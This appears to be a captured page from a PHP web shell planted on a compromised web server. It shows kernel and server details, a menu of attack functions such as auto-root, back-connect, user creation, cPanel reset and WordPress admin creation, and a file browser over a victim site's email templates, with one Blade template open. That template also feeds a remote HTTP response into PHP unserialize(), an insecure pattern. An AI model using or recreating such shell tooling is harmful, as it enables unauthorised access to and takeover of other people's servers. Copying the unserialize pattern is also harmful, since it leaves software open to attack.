Linux localhost 5.4.0-198-generic #218-Ubuntu SMP Fri Sep 27 20:18:53 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 23.92.16.63 | : 172.70.111.34
Cant Read [ /etc/named.conf ]
8.1.5
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
justhub /
source /
resources /
views /
emails /
[ HOME SHELL ]
Name
Size
Permission
Action
beat_my_quote.blade.php
4.15
KB
-rw-r--r--
contact_us.blade.php
1.38
KB
-rw-r--r--
contact_us_au.blade.php
985
B
-rw-r--r--
get_quote.blade.php
4.17
KB
-rw-r--r--
get_quote_au.blade.php
2.21
KB
-rw-r--r--
subscribe.blade.php
2.74
KB
-rw-r--r--
thank_you.blade.php
1.45
KB
-rw-r--r--
thank_you_au.blade.php
1.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : contact_us.blade.php
<html> <meta charset="UTF-8"> <body style="width: 100%" > <?php $ip=Request::ip(); $query = @unserialize(file_get_contents('http://ip-api.com/php/'.$ip)); ?> <table rules="all" style="border-color: #666; width: 100%" cellpadding="10"> <tr style='background: #eee;'><td colspan='2'><img src='{{ asset('assets/images/logo-just-hub.png') }}' alt=''/></td> <tr style='background: #eee;'><td colspan='2'>A new user has been contact to The Just Hub with following:</td> <tr><td><strong>Name:</strong> </td><td>{{$name}}</td></tr> <tr><td><strong>Email:</strong> </td><td>{{$email}}</td></tr> <tr><td><strong>Phone:</strong> </td><td>{{$phone}}</td></tr> <tr><td><strong>Site:</strong> </td><td>{{$site}}</td></tr> <tr><td><strong>Requirements/Message:</strong> </td><td>{{ $requirements_message }}</td></tr> @if($query && $query['status'] == 'success') <tr><td><strong>City is:</strong> </td><td>{{ $query['city'] }}</td></tr> <tr><td><strong>State is:</strong> </td><td>{{ $query['region'] }}</td></tr> <tr><td><strong>Zipcode is:</strong> </td><td>{{ $query['zip'] }}</td></tr> <tr><td><strong>IP is:</strong> </td><td><a href="https://whatismyipaddress.com/ip/{{$ip}}">{{ $ip }}</td></tr> @endif <tr style='background: #eee;'><td colspan='2'> Support<br> www.thejusthub.com </td> </tr> </table> </body></html>
Close